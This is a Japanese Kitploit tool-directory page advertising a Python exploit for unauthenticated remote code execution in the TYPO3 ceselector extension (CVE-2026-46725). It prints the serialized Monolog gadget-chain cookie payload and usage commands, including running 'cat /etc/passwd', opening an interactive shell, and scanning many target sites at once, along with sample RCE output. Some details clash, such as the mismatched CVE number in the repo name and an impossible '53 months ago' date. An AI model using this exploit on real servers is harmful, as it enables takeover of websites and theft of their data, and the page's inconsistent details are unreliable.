Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/xxconi/cve-2026-46275
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubxxconi/cve-2026-46275

CVE-2026-46275

CVE-2026-46725のPythonエクスプロイト。PHPオブジェクトインジェクションとMonologガジェットチェーンにより、TYPO3 ceselector拡張機能において認証なしのリモートコード実行を実現します。

リポジトリを見る
53ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-46725 — TYPO3 ceselector 拡張機能 RCE

unserialize() Cookie Bypass による PHP オブジェクトインジェクション → リモートコード実行

CVSS CWE Auth Python License


📋 目次

  • 脆弱性について
  • 技術詳細
  • 要件
  • インストール
  • 使用方法
  • 例
  • 出力形式
  • 動作原理
  • 参考資料
  • 法的免責事項

🔍 脆弱性について

項目詳細
CVE IDCVE-2026-46725
製品TYPO3 ceselector 拡張機能 (mmc/ceselector)
影響を受けるバージョン<= 1.1.3
脆弱性タイプ安全でないデシリアライズ (PHP オブジェクトインジェクション)
CVSS スコア9.8 Critical
CVSS ベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-502 (信頼できないデータのデシリアライズ)
EPSS スコア0.0046 (%64.3 percentile)
認証不要 (認証なし)
影響完全な RCE — システム完全制御
研究者DhiyaneshDk

説明

TYPO3 ceselector 拡張機能は、T3_ceselector_* という名前の Cookie 値を検証せずに直接 unserialize() 関数に渡します。攻撃者は、この Cookie に特別に細工した PHP オブジェクトインジェクション ペイロードを仕込むことで、サーバー上で任意のコマンドを実行できます。

⚠️ 前提条件: この脆弱性を悪用するには、TYPO3 の設定で Persistent Mode: Static が有効になっている必要があります。


🔧 技術詳細

攻撃フロー

root@kitploit:~
1. GET /  →  サーバー Set-Cookie: T3_ceselector_<id>=<value> を返す
2. GET /  →  Cookie: T3_ceselector_<id>=<PAYLOAD>
             └─ PHP unserialize() がトリガーされる
             └─ Monolog Gadget Chain が実行される
             └─ system("id") の出力がレスポンスに反映される

Gadget Chain

root@kitploit:~
Monolog\Handler\GroupHandler
  └─ Monolog\Handler\BufferHandler
       └─ Monolog\LogRecord (buffer)
            └─ processors: [get_object_vars, end, system]
                 └─ system("<CMD>")  ← RCE

ペイロード構造

root@kitploit:~
O:28:"Monolog\Handler\GroupHandler":1:{
  s:11:"*handlers";a:1:{
    i:0;O:29:"Monolog\Handler\BufferHandler":6:{
      s:10:"*handler";r:3;
      s:13:"*bufferSize";i:1;
      s:14:"*bufferLimit";i:0;
      s:9:"*buffer";a:1:{
        i:0;O:17:"Monolog\LogRecord":2:{
          s:5:"level";E:19:"Monolog\Level:Debug";
          s:5:"mixed";s:2:"id";   ← OS コマンドはここ
        }
      }
      s:14:"*initialized";b:1;
      s:13:"*processors";a:3:{
        i:0;s:15:"get_object_vars";
        i:1;s:3:"end";
        i:2;s:6:"system";   ← sink
      }
    }
  }
}

📦 要件

  • Python 3.8+
  • requests ライブラリ
root@kitploit:~
Python >= 3.8
requests >= 2.28.0

⚙️ インストール

root@kitploit:~
# リポジトリをクローン
git clone https://github.com/example/CVE-2026-46725
cd CVE-2026-46725

# 依存関係をインストール
pip install requests

# または requirements.txt を使用
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

🚀 使用方法

root@kitploit:~
usage: CVE-2026-46725 [-h] (-u URL | -l FILE) [-c CMD] [-i]
                      [-t N] [--timeout S] [--proxy URL]
                      [-o FILE] [-v] [--no-color]

options:
ターゲット:
  -u, --url URL       単一ターゲット URL
  -l, --list FILE     ターゲットリスト(1行に1URL)

エクスプロイト:
  -c, --cmd CMD       実行する OS コマンド(デフォルト: id)
  -i, --interactive   エクスプロイト成功後に対話型シェルを開く

スキャン:
  -t, --threads N     スレッド数(デフォルト: 10)
  --timeout S         タイムアウト(秒)(デフォルト: 15)
  --proxy URL         プロキシ(例: http://127.0.0.1:8080)

出力:
  -o, --output FILE   結果ファイル
  -v, --verbose       詳細出力
  --no-color          色なし出力

📌 例

単一ターゲット — 基本使用

root@kitploit:~
python CVE-2026-46725.py -u https://typo3-site.com

カスタムコマンド実行

root@kitploit:~
python CVE-2026-46725.py -u https://typo3-site.com -c "whoami"
python CVE-2026-46725.py -u https://typo3-site.com -c "cat /etc/passwd"
python CVE-2026-46725.py -u https://typo3-site.com -c "uname -a"

対話型シェル

root@kitploit:~
python CVE-2026-46725.py -u https://typo3-site.com --interactive
root@kitploit:~
typo3@ceselector $ id
│ uid=33(www-data) gid=33(www-data) groups=33(www-data)
typo3@ceselector $ uname -a
│ Linux web01 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
typo3@ceselector $ pwd
│ /var/www/html
typo3@ceselector $ exit

一括スキャン

root@kitploit:~
# 20スレッドでスキャン、結果を保存
python CVE-2026-46725.py -l targets.txt -t 20 -o results.txt

# 30スレッド、カスタムコマンド
python CVE-2026-46725.py -l targets.txt -t 30 -c "id"

プロキシ経由 (Burp Suite)

root@kitploit:~
python CVE-2026-46725.py -u https://typo3-site.com \
  --proxy http://127.0.0.1:8080 -v

targets.txt 形式

root@kitploit:~
https://site1.com
https://site2.com
http://site3.com
site4.com

📊 出力形式

ターミナル出力

root@kitploit:~
① TYPO3 & ceselector 検出
────────────────────────────────────────────────────
· TYPO3             ✓ 検出
· ceselector        ✓ 有効
· Cookie 名        T3_ceselector_48291
· TYPO3 バージョン       12.4.3

② ペイロード準備中
────────────────────────────────────────────────────
· 手法            PHP オブジェクトインジェクション → Monolog Gadget Chain
· Gadget            Monolog\Handler\GroupHandler
· Sink              system()
· コマンド             id

④ RCE 出力
────────────────────────────────────────────────────
┌─ RCE 出力 ───────────────────────────────────
│ uid=33(www-data) gid=33(www-data) groups=33(www-data)
└─────────────────────────────────────────────────

ログファイル (results.txt)

root@kitploit:~
============================================================
CVE-2026-46725 — TYPO3 ceselector RCE
日付: 2026-05-26 17:30:00
============================================================

[+] RCE が取得できたターゲット (2)
----------------------------------------
URL        : https://typo3-site.com
バージョン      : 12.4.3
Cookie     : T3_ceselector_48291
コマンド      : id
出力      : uid=33(www-data) gid=33(www-data) groups=33(www-data)

🔬 動作原理

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│                    エクスプロイトフロー                   │
├─────────────────────────────────────────────────────────┤
│                                                         │
│  1. 検出                                                │
│     GET /  ──────────────────────► TYPO3 サーバー       │
│             ◄──── Set-Cookie: T3_ceselector_XXXXX ───── │
│                                                         │
│  2. ペイロード準備                                       │
│     build_payload("id")                                 │
│     └─ Monolog gadget チェーンを URL エンコード          │
│                                                         │
│  3. エクスプロイト                                      │
│     GET /                                               │
│     Cookie: T3_ceselector_XXXXX=O:28:"Monolog...        │
│             ──────────────────────► unserialize()       │
│                                    └─ __destruct()      │
│                                    └─ system("id")      │
│             ◄──── uid=33(www-data) gid=33(www-data) ─── │
│                                                         │
│  4. 検証                                                │
│     regex: uid=\d+\([a-z_][a-z0-9_-]*\)\s+gid=...      │
│                                                         │
└─────────────────────────────────────────────────────────┘

📚 参考資料

  • TYPO3 Security Advisory TYPO3-EXT-SA-2026-001
  • Packagist — mmc/ceselector
  • CWE-502: Deserialization of Untrusted Data
  • CVSS 3.1 Calculator

⚖️ 法的免責事項

このツールは教育および許可されたセキュリティテストのみを目的として開発されています。

  • 自身のシステムまたは書面による許可を得たシステムでのみ使用してください。
  • 無許可のシステムに対して使用することは違法であり、法的結果を招く可能性があります。
  • 開発者は、このツールの誤用について一切の責任を負いません。

CVE-2026-46725 | TYPO3 ceselector RCE | Python エクスプロイト

ツールをダウンロード